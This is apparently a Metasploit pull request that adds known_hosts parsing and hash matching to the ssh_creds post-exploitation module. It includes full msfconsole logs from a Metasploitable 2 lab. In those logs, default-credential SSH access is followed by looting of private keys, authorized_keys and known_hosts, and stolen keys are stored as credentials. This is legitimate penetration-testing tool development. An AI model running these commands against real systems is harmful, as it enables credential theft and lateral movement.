ssh_creds: PARSE_KNOWN_HOSTS & CRACK_KNOWN_HOSTS

[g0tmi1k]

This PR helps to improve by doing:

• Use SSH mixin
• Add PARSE_KNOWN_HOSTS & CRACK_KNOWN_HOSTS options, map out where target has been connecting too
• Tweak output
• Consistency with loot and other modules
• Update module metadata

Target is Metasploitable 2.

        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      0         1      0      0      0
After : *        default  1      1         1      1      5      1

Note, this module uses the exploit/multi/ssh/sshexec module to get a session. However, its not using the PR I recently opened up improving it (Thats out of scope for this PR).

Before

• Private key loading could silently failed
• Private key downloaded as loot but not stored as a credential
• known_hosts files downloaded but never analysed - left to user to-do manually
• Services: 0
  • Thus vuln wasn't linked

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use post/multi/gather/ssh_creds;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:34217 -> 10.0.0.10:22) at 2026-05-27 07:22:38 +0100
[*] Session 1 created in the background.

Module options (post/multi/gather/ssh_creds):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


View the full module info with the info, or info -d command.

msf post(multi/gather/ssh_creds) >

msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf post(multi/gather/ssh_creds) > run SESSION=1
[*] Finding .ssh directories
[*] Looting 3 .ssh directories
[*] Looting /home/msfadmin/.ssh directory
[+] Downloaded /home/msfadmin/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527072328_default_10.0.0.10_ssh.authorized_k_062625.txt
[-] Could not load SSH Key: invalid curve name
[+] Downloaded /home/msfadmin/.ssh/id_rsa -> /home/kali/.msf4/loot/20260527072331_default_10.0.0.10_ssh.id_rsa_064617.txt
[+] Downloaded /home/msfadmin/.ssh/id_rsa.pub -> /home/kali/.msf4/loot/20260527072334_default_10.0.0.10_ssh.id_rsa.pub_405138.txt
[*] Looting /home/user/.ssh directory
[!] Cannot access directory: /home/user/.ssh . Missing execute permission. Skipping.
[*] Looting /root/.ssh directory
[+] Downloaded /root/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527072338_default_10.0.0.10_ssh.authorized_k_041137.txt
[+] Downloaded /root/.ssh/known_hosts -> /home/kali/.msf4/loot/20260527072341_default_10.0.0.10_ssh.known_hosts_951312.txt
[*] Post module execution completed
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      1      5      0

msf post(multi/gather/ssh_creds) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf post(multi/gather/ssh_creds) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                     References
---------                ----       -------  --------  ----                     ----------
2026-05-27 06:22:38 UTC  10.0.0.10  None     {}        SSH User Code Execution  CVE-1999-0502,ATT&CK-T1021.004

msf post(multi/gather/ssh_creds) > creds
Credentials
===========

id   host  origin     service  public    private                                          realm  private_type  JtR Format  cracked_password
--   ----  ------     -------  ------    -------                                          -----  ------------  ----------  ----------------
593        10.0.0.10           msfadmin  57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a         SSH key

msf post(multi/gather/ssh_creds) > loot

Loot
====

host       service  type                 name                 content     info                          path
----       -------  ----                 ----                 -------     ----                          ----
10.0.0.10           ssh.authorized_keys  ssh_authorized_keys  text/plain  OpenSSH authorized_keys File  /home/kali/.msf4/loot/20260527072328_default_10.0.0.10_ssh.authorized_k_062625.txt
10.0.0.10           ssh.id_rsa           ssh_id_rsa           text/plain  OpenSSH id_rsa File           /home/kali/.msf4/loot/20260527072331_default_10.0.0.10_ssh.id_rsa_064617.txt
10.0.0.10           ssh.id_rsa.pub       ssh_id_rsa.pub       text/plain  OpenSSH id_rsa.pub File       /home/kali/.msf4/loot/20260527072334_default_10.0.0.10_ssh.id_rsa.pub_405138.txt
10.0.0.10           ssh.authorized_keys  ssh_authorized_keys  text/plain  OpenSSH authorized_keys File  /home/kali/.msf4/loot/20260527072338_default_10.0.0.10_ssh.authorized_k_041137.txt
10.0.0.10           ssh.known_hosts      ssh_known_hosts      text/plain  OpenSSH known_hosts File      /home/kali/.msf4/loot/20260527072341_default_10.0.0.10_ssh.known_hosts_951312.txt

msf post(multi/gather/ssh_creds) >

After

• All testing was done on this branch, with SSH mixin (SSH mixin: New functions to help populate workspaces #21479) and auth_brute_mixin applied (Auth_Brute mixin: Add report_host/report_service & remove dup IP:PORT #21396)
• Services recorded
• SHA265 fingerprint shown
• Automate reading in known_hosts,
  • Also attempt to "crack" them (with whatever is in our database)

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use post/multi/gather/ssh_creds;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:39183 -> 10.0.0.10:22) at 2026-05-27 07:44:12 +0100
[*] Session 1 created in the background.

Module options (post/multi/gather/ssh_creds):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CRACK_KNOWN_HOSTS  true             no        Attempt to identify hashed known_hosts entries by checking against workspace hosts
   PARSE_KNOWN_HOSTS  true             no        Parse plaintext known_hosts entries and store as workspace hosts
   SESSION                             yes       The session to run this module on


View the full module info with the info, or info -d command.

msf post(multi/gather/ssh_creds) >

msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      0

msf post(multi/gather/ssh_creds) > run SESSION=1
[*] Finding .ssh directories
[*] Looting 3 .ssh directories
[*] Looting /home/msfadmin/.ssh directory
[*] User: msfadmin
[+] Downloaded: /home/msfadmin/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527074444_default_10.0.0.10_ssh.msfadmin.aut_669207.txt
[+] Downloaded: /home/msfadmin/.ssh/id_rsa -> /home/kali/.msf4/loot/20260527074447_default_10.0.0.10_ssh.privatekey.r_686269.txt
[+] Stored SSH private key (id_rsa) for user: msfadmin
[+] Downloaded: /home/msfadmin/.ssh/id_rsa.pub -> /home/kali/.msf4/loot/20260527074450_default_10.0.0.10_ssh.publickey.rs_546440.txt
[*] Looting /home/user/.ssh directory
[!] Cannot access directory: /home/user/.ssh - Missing execute permission
[*] Looting /root/.ssh directory
[*] User: root
[+] Downloaded: /root/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527074454_default_10.0.0.10_ssh.root.authori_178272.txt
[+] Downloaded: /root/.ssh/known_hosts -> /home/kali/.msf4/loot/20260527074457_default_10.0.0.10_ssh.root.known_h_414686.txt
[*] Parsed 0 host entries from known_hosts
[+] Matched hashed known_hosts entry: localhost (10.0.0.10)
[*] Matched 1 hashed entry against workspace hosts
[*] Post module execution completed
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      1      5      1

msf post(multi/gather/ssh_creds) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info                                comments
-------    ---  ----  -------  ---------  -----  -------  ----                                --------
10.0.0.10             Unknown                    device   Matched via hashed SSH known_hosts

msf post(multi/gather/ssh_creds) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf post(multi/gather/ssh_creds) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                     References
---------                ----       -------       --------  ----                     ----------
2026-05-27 06:44:12 UTC  10.0.0.10  ssh (22/tcp)  {}        SSH User Code Execution  CVE-1999-0502,ATT&CK-T1021.004

msf post(multi/gather/ssh_creds) > creds
Credentials
===========

id   host  origin     service  public    private                                          realm  private_type  JtR Format  cracked_password
--   ----  ------     -------  ------    -------                                          -----  ------------  ----------  ----------------
595        10.0.0.10           msfadmin  57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a         SSH key

msf post(multi/gather/ssh_creds) > loot

Loot
====

host       service  type                          name                      content     info                                                path
----       -------  ----                          ----                      -------     ----                                                ----
10.0.0.10           ssh.msfadmin.authorized_keys  msfadmin_authorized_keys  text/plain  OpenSSH authorized_keys File                        /home/kali/.msf4/loot/20260527074444_default_10.0.0.10_ssh.msfadmin.aut_669207.txt
10.0.0.10           ssh.privatekey.rsa            msfadmin_id_rsa           text/plain  SHA256:f2VC/Mf1KPOyVzqeE6QpplojiGKjOzu8At+KIDT8T0U  /home/kali/.msf4/loot/20260527074447_default_10.0.0.10_ssh.privatekey.r_686269.txt
10.0.0.10           ssh.publickey.rsa             msfadmin_id_rsa.pub       text/plain  SHA256:f2VC/Mf1KPOyVzqeE6QpplojiGKjOzu8At+KIDT8T0U  /home/kali/.msf4/loot/20260527074450_default_10.0.0.10_ssh.publickey.rs_546440.txt
10.0.0.10           ssh.root.authorized_keys      root_authorized_keys      text/plain  OpenSSH authorized_keys File                        /home/kali/.msf4/loot/20260527074454_default_10.0.0.10_ssh.root.authori_178272.txt
10.0.0.10           ssh.root.known_hosts          root_known_hosts          text/plain  OpenSSH known_hosts File                            /home/kali/.msf4/loot/20260527074457_default_10.0.0.10_ssh.root.known_h_414686.txt

msf post(multi/gather/ssh_creds) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type            Data
 ----                     ----       -------  ----  --------  ----            ----
 2026-05-27 06:44:47 UTC  10.0.0.10  ssh      22    tcp       ssh.privatekey  {:user=>"msfadmin", :file=>"id_rsa", :fingerprint=>"SHA256:f2VC/Mf1KPOyVzqeE6QpplojiGKjOzu8At+KIDT8T0U"}

msf post(multi/gather/ssh_creds) >